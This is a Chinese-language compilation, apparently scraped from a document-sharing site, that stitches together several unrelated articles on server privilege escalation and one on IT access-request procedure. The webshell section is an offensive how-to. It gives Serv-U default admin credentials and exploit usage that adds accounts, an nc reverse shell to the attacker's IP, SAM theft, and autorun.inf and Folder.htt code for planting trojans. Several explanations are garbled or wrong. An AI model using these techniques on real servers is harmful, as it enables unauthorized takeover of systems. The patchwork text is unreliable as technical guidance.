服务器提权的介绍和方法
- 格式:doc
- 大小:31.00 KB
- 文档页数:4
服务器提权的方法嘿,朋友们!今天咱就来聊聊服务器提权这个事儿。
服务器提权,就好像是你在一个巨大的数字城堡里找到那把关键钥匙,打开隐藏的宝藏之门。
你想啊,服务器就像是一个装满了各种宝贝的大箱子,而提权呢,就是让你从只能在箱子外面瞅瞅,变成能大摇大摆地走进去翻找宝贝。
但这可不是随便就能做到的哦!比如说,你得先熟悉这个服务器的“脾气性格”,知道它有哪些弱点和漏洞。
这就好比你要了解一个人的喜好和忌讳一样,不然怎么能找到突破口呢?有时候,可能就是一个小小的配置错误,或者一个被忽略的安全设置,就成了你进入的“门缝”。
然后呢,你得有足够的耐心和细心,一点点地去试探、去挖掘。
就像挖矿一样,不能心急,得慢慢地找,说不定哪一锄头下去就挖到宝了呢!你可不能大大咧咧地乱搞,不然服务器这个“大怪兽”可会发脾气,把你给赶出来哦。
还有啊,你得掌握一些技巧和工具。
这就像是战士上战场得有称手的兵器一样。
不同的服务器可能需要不同的方法和工具,你得学会灵活运用。
可别拿着一把刀就想去砍所有的怪,那可不行!举个例子吧,有一次我遇到一个服务器,那真叫一个顽固啊!我试了好多方法都不行,差点就想放弃了。
但我不甘心啊,我就继续钻研,最后终于发现了一个隐藏得很深的漏洞,就像找到了隐藏在迷宫深处的出口一样兴奋!服务器提权可不是一件容易的事儿,但一旦你成功了,那种成就感,哇,简直没法形容!就好像你征服了一座高峰,站在山顶上俯瞰一切的感觉。
不过咱可得说好了,提权这事儿可不能乱来哦!不能拿去做坏事。
咱得用在正途上,比如为了更好地维护服务器的安全,或者解决一些实际问题。
要是拿去搞破坏,那可就不对啦,那是要遭报应的哦!总之呢,服务器提权是一项既有挑战性又有趣的事情。
只要你有足够的耐心、细心和技术,再加上一点点运气,说不定你就能成为那个打开服务器宝藏之门的人呢!加油吧,朋友们!。
常见提权方法1. 用户提权:用户提权是指普通用户通过某种方式获取管理员权限或超级用户权限的行为。
常见的用户提权方法包括:利用弱密码、使用系统漏洞、利用特权提升程序等。
详细描述:用户提权是黑客经常使用的一种手段,通过获取管理员权限,黑客可以执行更高级别的操作,如修改系统配置、访问敏感文件等。
利用弱密码是最常见的用户提权方法之一。
黑客可以使用密码破解工具或暴力破解技术尝试猜解用户密码,一旦成功登录系统,就可以获取管理员权限。
系统漏洞也是用户提权的常见方法之一。
黑客可以通过渗透测试或漏洞扫描等方式发现系统中的漏洞,然后利用这些漏洞获取管理员权限。
某个系统可能存在一个未修补的漏洞,黑客可以利用这个漏洞上传特制的脚本,从而获得系统的控制权。
黑客还可以利用特权提升程序来提权。
这些程序的功能是在受限的用户权限下执行特权操作,如创建新用户、修改用户组等。
黑客可以通过执行这些特权提升程序来获取管理员权限,从而获得系统的完全控制权。
2. 命令注入:命令注入是指黑客通过在输入框或URL参数中注入恶意命令,从而执行非授权的操作。
常见的命令注入方法包括:通过修改URL参数、利用操作系统命令执行漏洞等。
详细描述:命令注入是一种常见的网络攻击手法,黑客通过在输入框或URL参数中注入恶意命令,从而执行非授权的操作。
黑客可以在一个搜索框中输入特定的字符串,以执行系统命令,或是通过改变URL参数来获取系统权限。
命令注入通常利用了操作系统的命令执行漏洞。
当用户传递的输入被直接用于构造系统命令时,如果没有正确进行输入验证和过滤,黑客就可以通过构造恶意输入来执行非授权的操作。
这种攻击方式在许多Web应用程序中非常常见,如论坛、博客等。
为了防止命令注入攻击,开发者应该始终对用户输入进行适当的验证和过滤。
可以使用特定的字符过滤器来禁止或转义危险的字符,或是通过使用参数化查询和预编译语句等方式防止SQL注入。
3. 文件包含漏洞:文件包含漏洞是指黑客通过利用应用程序中的文件包含功能来执行恶意代码。
msf提权原理MSF提权原理概述:Metasploit Framework(简称MSF)是一款开源的渗透测试工具,被广泛应用于安全行业。
其中,提权是渗透测试中的重要环节之一,而MSF提供了多种方法和模块来实现提权操作。
本文将介绍MSF 提权的原理和常用方法。
一、MSF提权原理:MSF提权的基本原理是通过利用目标主机上的漏洞或弱点,获取更高权限的访问权。
MSF通过对目标主机进行渗透测试,发现目标主机上的漏洞,并利用这些漏洞来提升攻击者的权限。
二、MSF提权方法:1. 本地提权:本地提权是指攻击者已经获取了一定的访问权限,但希望进一步提升权限,以获取更高的权限。
MSF提供了一些本地提权模块,用于利用目标主机上已知的漏洞或弱点,获取更高权限的访问权。
2. 远程提权:远程提权是指攻击者通过远程方式攻击目标主机,以获取目标主机上的更高权限。
MSF提供了一些远程提权模块,用于利用目标主机上已知的漏洞或弱点,获取更高权限的访问权。
常见的远程提权方法包括利用系统服务漏洞、利用应用程序漏洞等。
3. 社会工程学提权:社会工程学提权是通过欺骗目标用户,获取目标主机上的更高权限。
MSF提供了一些社会工程学提权模块,用于利用用户的信任心理或对安全意识的漠视,获取目标主机上的更高权限。
4. 水平提权:水平提权是指攻击者通过获取局域网内其他主机的访问权,进一步提升攻击者自身的权限。
MSF提供了一些水平提权模块,用于在局域网内扩大攻击面,获取更多主机的访问权。
三、MSF提权流程:1. 信息收集:需要对目标主机进行信息收集,包括目标主机的操作系统、服务、漏洞等信息。
MSF提供了多种信息收集模块,用于获取目标主机的相关信息。
2. 漏洞扫描:根据信息收集的结果,选择合适的漏洞扫描模块,并对目标主机进行漏洞扫描。
漏洞扫描模块可以自动检测目标主机上的漏洞,为后续的提权操作提供基础。
3. 漏洞利用:根据漏洞扫描的结果,选择合适的漏洞利用模块,并对目标主机进行漏洞利用。
linux提权总结在Linux中,提权是非常重要的一个主题。
它可以让我们获得更高的系统权限,从而更好的操作系统。
下面是一些Linux提权的总结:一、查找可利用的漏洞1. 查找系统中的可利用漏洞使用不同的简单命令,例如sudo -l可列出当前用户可以执行的命令,而find / -perm -4000可以列出给定系统上所有具有SUID权限的可执行文件。
这两种技巧都可能找到系统中的可利用漏洞。
其它漏洞利用工具如Nmap、Metasploit等也可以辅助查找漏洞。
二、提升权限1. 使用kernel exploit提升权限kernel exploit利用特定版本的内核漏洞,将用户权限提升到root。
2. 利用sudo漏洞通过利用sudo中的配置错误,我们可以提升当前用户的特权级别。
例如,通过编辑/etc/sudoers文件来导入自己的配置文件,从而实现特权执行。
3. 利用setuid配置错误在Linux中,特殊权限比SUID bit更强大。
可以将可执行文件的特殊权限设置为setuid 0,这样当普通用户执行文件时,它将以root用户身份运行。
4. 利用共享库链接漏洞这种提升权限的方法利用了一种特定类型的动态链接,即共享库链接。
当一个可执行文件链接到一个共享库时,该文件会检查共享库是否存在,并将共享库加载到内存中。
如果我们能够利用该可执行文件的搜索路径中的共享库链接,那么我们就可以控制共享库并提升特权。
三、后门及提权1. 利用已安装后门已安装后门可能会利用暴力猜解或默认口令来访问系统。
管理员或系统管理员可能会安装后门程序,放置一个钓饵文件或作出其他举措来引诱攻击者进入系统。
2. 利用远程控制软件某些具有远程控制功能的软件,例如SSH、VNC和Telnet等,在攻击者未知的情况下也可能成为后门。
3. 利用本地攻击本地攻击是指攻击者在直接访问受害者计算机的情况下进行攻击。
这样的攻击可以通过诸如键盘记录器、缓冲区溢出、堆溢出和代码注入等技术来实现。
sql server提权方法汇总SQL Server提权是一种常见的攻击手段,通常用于获取系统管理员权限。
以下是一些常用的SQL Server提权方法汇总:1. 用户名欺骗:通过猜测或欺骗系统中的默认用户名(如sa)来获取管理员权限。
攻击者可能会尝试使用与默认用户名相似的用户名进行登录,或者通过猜测密码的方式尝试破解管理员账户。
2. 暴力破解:通过尝试所有可能的用户名和密码组合来破解管理员账户。
攻击者可以使用自动化工具或脚本进行暴力破解,尝试登录到SQL Server 并获取管理员权限。
3. 社工攻击:攻击者通过收集目标的信息,如用户名、密码、电子邮件地址等,尝试使用这些信息进行登录。
攻击者可能会使用已知的弱密码或通过社交工程手段获取密码。
4. 注入攻击:攻击者通过在SQL查询中注入恶意代码,利用SQL注入漏洞获取管理员权限。
攻击者可能会尝试在用户输入的数据中插入恶意的SQL代码,从而控制数据库并获取管理员权限。
5. 漏洞利用:利用SQL Server的已知漏洞进行提权。
这些漏洞可能包括已知的安全漏洞、软件漏洞或配置错误。
攻击者可能会利用这些漏洞来获取管理员权限。
6. 提升数据库用户权限:攻击者通过提升数据库用户权限来获取管理员权限。
攻击者可能会创建一个数据库用户,并将其权限提升到管理员级别,从而获得对整个系统的访问权限。
7. 远程桌面提权:攻击者通过远程桌面服务或其他远程访问工具连接到目标服务器,并尝试使用管理员账户登录。
如果成功,攻击者将获得对整个系统的访问权限。
请注意,以上方法并非适用于所有情况,具体提权方法取决于目标环境和安全设置。
在进行任何攻击之前,建议仔细评估风险并遵守相关法律法规。
此外,为了加强SQL Server的安全性,建议采取以下措施:1. 定期更新和打补丁:确保及时更新SQL Server的补丁和安全更新,以修复已知的安全漏洞。
2. 强化密码策略:实施强密码策略,限制用户账户的默认密码复杂性要求,并定期更改密码。
mysql提权种方法MySQL提权是指在MySQL数据库中获取更高权限的过程。
MySQL提权的目的是为了获取更多的操作权限,以便对数据库进行更深入的操作和控制。
MySQL提权的方法有很多种,下面将介绍其中几种常用的方法。
1. 利用已有的高权限账号进行提权:在MySQL中,有些账号拥有较高的权限,如root账号。
如果我们已经获取到了这些账号的访问权限,就可以通过切换到这些账号来实现提权。
可以使用以下命令切换账号:```sqlmysql> use mysql;mysql> update user set password=PASSWORD('new_password') where user='root'; mysql> flush privileges;```其中,'new_password'是你想要设置的新密码。
2. 利用已存在的漏洞进行提权:MySQL中可能存在一些已知的漏洞,攻击者可以利用这些漏洞来提升自己的权限。
例如,MySQL 5.0.22之前的版本中存在一个UDF提权漏洞,攻击者可以通过该漏洞加载自定义的UDF函数,从而提升自己的权限。
但需要注意的是,这些漏洞通常会被官方及时修复,因此在实际操作中,应该选择目标版本中已知的漏洞。
3. 利用系统权限提权:MySQL数据库是运行在操作系统上的,因此可以通过提升操作系统的权限来实现MySQL的提权。
例如,如果攻击者已经获取了操作系统的root权限,那么他也可以直接拥有MySQL的root权限。
可以使用以下命令来提升操作系统权限:```bash$ sudo su```其中,sudo命令用于以root权限执行后续的命令。
4. 利用存储过程进行提权:存储过程是MySQL中的一种特殊的代码块,可以被调用和执行。
攻击者可以使用存储过程来执行一些高权限操作,从而实现提权。
例如,可以通过以下代码创建一个存储过程来实现提权:```sqlmysql> CREATE PROCEDURE root_privileges()-> BEGIN-> DECLARE CONTINUE HANDLER FOR SQLSTATE '42000' SET result = 1;-> SET @sql_text = CONCAT('GRANT ALL PRIVILEGES ON *.* TO \'root\'@\'localhost\'');-> PREPARE stmt FROM @sql_text;-> EXECUTE stmt;-> END;```然后,可以通过以下命令调用存储过程来实现提权:```sqlmysql> CALL root_privileges();```5. 利用数据库配置文件进行提权:MySQL的配置文件中包含了数据库的配置信息,攻击者可以修改配置文件中的参数来实现提权。
常见提权方法(一)常见提权方法1. 操作系统提权•提权漏洞利用:利用操作系统中已知的提权漏洞来获取系统权限,常见的漏洞包括文件权限配置错误、缓冲区溢出、逻辑漏洞等。
•拓展权限:利用操作系统提供的一些特殊权限或命令,如suid、sgid、sudo等,来获取临时的特权身份。
2. 应用程序提权•应用程序漏洞利用:利用应用程序中存在的漏洞,如SQL注入、远程代码执行、文件上传等,通过攻击者构造恶意数据或代码,来提升自己的权限。
•提权脚本/工具:使用已存在的提权脚本或工具,如Metasploit、MSFvenom等,来快速提升应用程序权限。
3. 身份伪装提权•社会工程学攻击:通过伪装成合法用户、管理员或其他高权限身份,诱导目标用户提供权限,如通过钓鱼邮件、伪装网站等手段。
•口令猜测/破解:对目标系统、应用程序的口令进行暴力猜测或使用破解工具,如字典攻击、暴力破解等。
•弱口令:对系统、应用程序等的默认账号密码或弱口令进行攻击,如admin/admin、123456等常见弱口令。
•配置错误利用:利用系统或应用程序配置错误,如未及时更新软件、未关闭不必要的服务等,从而获得系统权限。
5. 特殊设备提权•物理入侵:通过实际接触目标设备,如服务器、路由器等,进行操作,获取管理权限。
•设备漏洞利用:利用特殊设备(如网络摄像头、智能家居等)存在的漏洞,进行远程攻击,获取设备权限。
以上是常见的提权方法,在进行安全防护时,需要注意及时更新系统和应用程序、配置合理的权限控制、使用强密码、定期进行安全审计等,以有效防范提权攻击的发生。
6. 物理设备提权•USB攻击:通过携带恶意的USB设备,如USB键盘模拟器、USB 存储设备等,来获取目标设备的权限。
•直接访问:通过直接访问目标设备的控制台或终端,如服务器、交换机等,进行非法操作,获取设备权限。
•中间人攻击:通过在网络通信过程中劫持、篡改或窃取数据,获取目标系统或应用程序的权限。
使用IT服务的权限是哪个流程介绍IT服务权限是指在企业中使用IT设备和系统所需的权限。
通过合理设置和控制IT服务权限,可以确保企业数据的安全和保密性。
本文将介绍使用IT服务所需权限的流程和步骤。
步骤以下是使用IT服务权限的流程:1.申请权限–在需要使用IT服务的员工需要向IT部门或相关管理员提出权限申请。
–提供相关个人信息和理由,说明需要的权限和目的。
–如果有需要,可能需要提供相关培训或证书以支持权限申请。
2.审查权限申请–IT部门或管理员需要审查权限申请,确认申请人的合法性和需要的权限是否合理。
–如果需要,可以与申请人进行沟通或进一步核实。
3.权限批准–一旦权限申请经过审查,确认合理有效后,IT部门或管理员会批准权限申请。
–批准后,相关权限将被分配给申请人。
4.权限分配–IT部门或管理员将相应的权限分配给申请人。
–分配的权限可能包括访问特定系统、使用特定软件、管理特定文件或数据等。
5.权限管理–一旦权限被分配给申请人,IT部门或管理员需要进行权限管理。
–这包括定期审查权限的使用情况,确保权限的合理使用和安全性。
6.权限取消或调整–如果申请人不再需要特定权限,或者权限的需求发生变化,申请人需要向IT部门或管理员申请权限的取消或调整。
–IT部门或管理员将审查申请并根据情况取消或调整权限。
7.权限停用–在某些情况下,权限可能会被临时或永久停用。
–临时停用是指在特定时间范围内暂停权限的使用,通常是因为安全性问题或特殊活动。
–永久停用是指彻底取消权限的使用权,通常发生在员工离职或权限滥用的情况下。
注意事项在使用IT服务权限时,需要注意以下事项:•申请合理权限:申请人应确保申请的权限是合理且必要的,以避免滥用或不当使用权限。
•遵守相关规定和政策:使用IT服务权限时,申请人必须遵守企业的相关规定和政策,以保护企业数据和系统的安全。
•定期审查权限:IT部门或管理员应定期审查权限的使用情况,确保权限的合理性和安全性。
linux提权原理介绍如下:在Linux 中,提升权限通常是指将普通用户权限提升为超级用户,也就是root 用户。
这个过程涉及到两个重要的概念:权限和漏洞。
1.权限:Linux 中的文件和目录都有权限,包括读、写和执行权限。
系统管理员可以为每个文件和目录分配不同的权限,以控制用户对它们的访问。
root 用户的权限是最高的,可以访问系统中的任何文件和目录。
2.漏洞:Linux 系统中的漏洞包括软件漏洞和配置漏洞。
黑客可以利用这些漏洞来攻击系统,提升权限并获得root 权限。
漏洞常常是由于软件本身的错误或配置不当引起的。
黑客可以通过以下几种方式来提升权限:1.利用系统漏洞:黑客可以利用Linux 系统中的漏洞来提升权限,例如操作系统或应用程序中的缓冲区溢出漏洞、滥用sudo 命令或其他命令执行漏洞等。
2.提权工具:黑客可以使用一些专门的Linux 提权工具来进行攻击,例如使用LinEnum、SUID3NUM、Unix-privesc-check 等工具来查找系统漏洞并提权。
3.修改系统配置文件:黑客可以用root 用户权限修改系统配置文件,例如/etc/passwd、/etc/sudoers 等文件,从而控制整个系统。
为了防止被黑客攻击,用户需要注意以下几点:1.及时更新系统:经常更新操作系统和应用程序,以消除已知漏洞。
2.最小化系统特权:尽可能降低程序运行所需的特权。
例如,使用低特权帐户运行Web服务器或数据库服务器。
3.防火墙保护:使用防火墙保护系统,过滤不必要的入站和出站流量。
4.禁用不必要的服务:禁用系统中不必要的服务或应用程序,减少系统的攻击面。
常见的提权类型常见的提权类型在计算机安全领域中,提权是指攻击者通过某种方式获取比其当前权限更高的权限,从而可以执行更多的操作。
提权攻击是一种非常危险的攻击方式,因为攻击者可以利用提权后的权限来执行恶意操作,比如窃取敏感信息、篡改数据、破坏系统等。
本文将介绍几种常见的提权类型。
一、本地提权本地提权是指攻击者在本地系统上获取更高权限的过程。
攻击者通常需要利用已知或未知漏洞来实现本地提权。
以下是几种常见的本地提权技术:1.1 栈溢出栈溢出是一种非常常见和危险的漏洞类型。
当程序没有正确地检查输入时,攻击者可以通过向程序输入超过其预期大小的数据来覆盖栈上其他重要数据(如返回地址),从而控制程序流程并执行任意代码。
如果攻击者能够成功利用栈溢出漏洞,他就可以在当前用户权限下执行任意代码,并可能获得更高级别的访问权限。
1.2 提交服务提交服务(也称为SUID)是一种特殊类型的文件权限,在该文件上设置SUID标志后,任何人都可以以该文件的所有者身份运行它。
攻击者可以利用SUID文件来获取更高级别的访问权限,比如root权限。
例如,攻击者可以通过利用/bin/passwd中的SUID标志来修改root密码。
1.3 内核漏洞内核是操作系统的核心组件,控制着计算机的各种资源和服务。
如果攻击者能够利用内核漏洞,他就可以获得更高级别的访问权限。
例如,攻击者可以通过使用Linux kernel中的Dirty COW漏洞来获取root权限。
二、远程提权远程提权是指攻击者在远程系统上获取更高级别访问权限的过程。
以下是几种常见的远程提权技术:2.1 远程执行代码漏洞远程执行代码漏洞(也称为RCE)是一种网络安全漏洞,允许攻击者在目标系统上执行任意代码。
如果攻击者能够成功利用RCE漏洞,则可以在目标系统上获得更高级别的访问权限。
2.2 服务端请求伪造(SSRF)服务端请求伪造(SSRF)是一种网络安全漏洞,允许攻击者向外部服务器发起请求并将响应返回到目标服务器上。
现在可以说网络管理员对服务器的设置是越来越BT,但BT的同时,也有黑客朋友们对服务器的不断的测试,在测试中往往获取最低的guest权限是简单的,像我们在入侵网站过程中,获取webshell是简单的,但是当由webshell的guest权限向system权限提升时却往往是止步不前。
所以我有想写这样一篇文章的想法,但是在思考的过程中,又不得不承认,方法是不断的探索中出来的,方法更是有常规的也有另辟蹊径的。
下面就做一些简单的介绍,对提权的方法进行一些介绍,同时也希望在更多朋友的不断回复中能够丰富我们的方法。
首先要说明的是,过早的一些漏洞我们就不再多说了,只说一些现在可以见到的吧。
还有就是本文的题目是webshell下的服务器提权方法。
下面我们就进入主题,对webshell的提权方法!首先我们要明确的是,提权一般是依靠主机所开通的服务,利用服务存在的漏洞和管理员设置的疏忽进行提权的,不过也不排除一些SB的管理员对服务器设置的似乎没有"穿衣服".下面就是针对一些常见的服务进行的提权方法。
在获取webshell后,我们常见的是看一下系统的服务,查看服务可以通过利用扫描器对服务器ip进行扫描,或是在webshell中有执行dos命令时查看net start来查看主机所开放的服务。
首先我们说一下从简单的开始说起:1.pcanywhere的提权方法pcanywhere软件我想大家都了解,为什么将它放在首位就是因为读取密码后直接连接就可以了,如果对方主机在开通了pcanywhere的服务端的话,我们看能否跳转到这个目录C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\,如果行那就最好了,直接下载它的CIF文件,然后使用pcanywhere的密码读取器得到pcAnywhere密码,然后使用pcanywhere登陆即可!接下来就是可视化操作了。
2.Serv-U提权方法Serv-u可以说是网络上比较火的一款FTP服务器软件,有许多像我这样的小黑们都是看系统服务中是否有Serv-u的系统进程来进行提权的。
Serv-u的提权方法针对不同的版本也有不同的方法,这里我们就列举一二,可能不是很全,但在其他网友的回复中能够不断的补充吧!a.serv-U本地提权:serv-U本地提权一般是利用溢出程序对serv-u的设置上的缺陷进行添加超级账户的功效。
例如Xiaolu写的serv-u.exe就是利用sevr-u的默认管理端口,管理员账号和密码进行提权的,默认本地管理端口是:43958,默认管理员:LocalAdministrator,默认密码:#l@$ak#.lk;0@P,这是集成在Serv-u内部的,可以以Guest权限来进行连接,对Serv-u进行管理,利用本地提权的关键就是寻找服务器文件目录中的everyone权限目录,下面我给大家列举些常见的everyone权限目录:c:\winnt\system32\inetsrv\data\是erveryone 完全控制,很多时候没作限制,把提升权限的工具上传上去,然后执行c:\prelC:\Program Files\Java Web Start\c:\Documents and Settings\C:\Documents and Settings\All Users\Documents\很多时候data目录不行,试试这个很多主机都是erveryone 完全控制!C:\Program Files\Microsoft SQL Server\c:\Temp\c:\mysql\(如果服务器支持PHP)c:\PHP(如果服务器支持PHP)上面一些目录就是常见的,不过也不排除一些特殊的,像江民的kv2004对文件夹的权限设置就不是很严格的。
不过针对本地提权是可以防范的,下面是我在xiaolu的文章中节选的:防止办法和对策:一般防止方法:设置目录权限,通过去掉Web目录iusr用户的执行权限来防止使用Webshell来运行Exp程序。
对策:这种方法有一定的局限性,需要设置的目录很多,不能有一点疏漏,比如我就发现很多虚拟主机在C:\Documents and Settings\All Users\ Documents目录以及下边几个子目录Documents没有设置权限,导致可以在这个目录上传并运行Exp,这种目录还有x:\php,x:\perl 等,因为这种目录都是everyone完全控制的。
有些主机还支持php,pl,aspx等,这简直就是服务器的Serv-U灾难,^_^,运行程序更加方便。
高级一点的防止办法:修改Serv-u管理端口,用Ultraedit打开ServUDaemon.exe查找B6AB(43958的16进制),替换成自己定义的端口比如3930(12345),打开ServUAdmin.exe 找到最后一个B6AB替换成3930(12345),启动Serv-u,现在本地管理端口就成了12345了:TCP 127.0.0.1:12345 0.0.0.0:0 LISTENING对策:对付这种也很简单,netstat –an,就能看到端口了,有人说netstat无法运行,其实你再上传个netstat.exe到可执行目录运行就ok了,然后修改一下Exp编译,上传运行就好了,我修改了一个可以自定义端口的Exp,运行格式:USAGE: serv-u.exe port "command"Example: serv-u.exe 43958 "net user xl xiaoxue /add"更高级的防止办法:修改管理员名和密码,用Ultraedit打开ServUDaemon.exe查找Ascii:LocalAdministrator,和#l@$ak#.lk;0@P,修改成等长度的其它字符就可以了,ServUAdmin.exe 也一样处理。
对策:这下默认的管理员连接不上了,还有办法么?嘿嘿,有的管理员安装Serv-u都是使用默认目录C:\Program Files\Serv-U安装,这个目录虽然不能写,也不能修改,但是默认iusr是可以读的,我们可以用webshell来下载ServUDaemon.exe,用Ultraedit打开分析一下,Serv-U的帐号密码就到手了,修改Exp编译上传运行,我们又胜利了。
终极防御:a.设置好目录权限,不要疏忽大意;b.Serv-U最好不要使用默认安装路径,设置Serv-U目录的权限,只有管理员才能访问;c.用我介绍的办法修改Serv-U的默认管理员名字和密码,喜欢的话端口也可以改掉。
d.serv-U管理端口定向转发法:这里需要使用的工具是FPipe.exe我们要知道Serv-u默认本地管理端口是:43958,这个是只允许本地ip127.0.0.1进行登陆和管理的,那么我们就想能不能通过端口转向来远程管理呢?所以我们用到FPipe.exe,首先是将FPipe.exe上传至服务器中,然后再cmd下执行Fpipe.exe -v -l 12345-r 43958 127.0.0.1这里要说明的是,这段字符的意思是当访问12345端口时就会自动转向43958端口,也就是serv-u的管理端口所以我们在本地安装一个Serv-u,新建一个服务器,填入对方IP,user:LocalAdministratorpass:#l@$ak#.lk;0@P连接上后你就可以管理他的Serv-u了,剩下的操作就是执行上面提到的方法了!===================================================Serv-U的方法我就总结出这几个来,可能还有其他的方法我没有看到吧不过个人认为关键还是本地溢出漏洞的应用要比较多一些,所以网上也常常出现serv-u 的本机溢出程序不同版本的更是层出不穷,前一段时间针对serv-u6.0.2的修改了默认管理员账号和密码的相关文章还请大家参照校园黑客联盟的小鱼修炼中的文章。
Serv-U的提权文章就暂时先总结到这里,有更好的方法还请大家回复!3.Autorun方法:这种方法也可以说是比较古老的方法,最初应该是从光盘自动播放中寻找到的灵感吧?不进行细说,给出格式即可制作一个Autoruan.inf文件.内容如下[AutoRun]open=bear.exebear.exe为木马程序,与autorun.inf放在同一目录下!4.SAM破解方法:进入C:\WINNT\system32\config\ 下载他的SAM文件用lc等破解工具破解。
5.相关脚本提权方法:前面的serv-u的ftp提权中提过的vbs这里再说下.进入c:\Documents and Settings\All Users\「开始」菜单\程序\启动写入bat或vbs文件。
这种方法也是属于守株待兔类的,只有在对方主机重起以后才可以达到目的。
6.NC的反弹提权:这里就要说NC的相关用法了,如果在对方服务器中有足够的权限执行nc的话就好了,把它反弹到自己的电脑上,你就可以进行相关操作了!瑞士军刀具体方法不多说,给出格式,如下:server:nc -e cmd.exe ip 1234client: nc -l -p 12347.conn等asp文件中泄漏SQL帐户密码方法:这种方法说起来应该算是比较侥幸的方法。
曾经马俊和我说过一次,原来没有太在意,现在还真的感觉有些好用了,找到账号密码和数据库名在对方没有删除xp_cmdshell条件下用sql连接工具连接即,连接上后就可以输入你想要的CMD命令了。
8.VNC的相关提权:VNC也是一个类似pcanywhere的远程管理软件,在linux应用广泛,曾经在看台湾的一些服务器中有很多使用VNC的,方法也是我在网络中学到的,不过在应用中就成功过一次,比较郁闷!方法就转载一下吧,网址:/Article/HTML/14184.html还有要补充的就是vnc是可以反向连接的,这个方法我没有试过,只是曾经看影子做过一个视频动画。
9.desktop.ini与Folder.htt方法。
(此方法是在网络看到的)方法如下:首先建立一个文件夹,进入,在空白处点右键,选择“自定义文件夹”一直下点,默认即可。
完成后,你就会看到在此目录下多了两个名为Foldersetting的文件架与desktop.ini的文件,如果看不到,就把显示所有文件给选上,然后我们在Folder setting目录下找到Folder.htt文件,记事本打开,在任意地方加入以下代码:<OBJECT ID=“RUNIT” WIDTH=0 HEIGHT=0 TYPE=”application/x-oleobject” CODEBASE=“木马名”></OBJECT> 然后你将你的木马文件放在Folder setting目录下,把此目录与desktop.ini一起上传到对方任意一个目录下,就可以了,只要等管理员浏览了此目录,它就执行了我们的木马,此方法也属于类似autorun的守株待兔方法。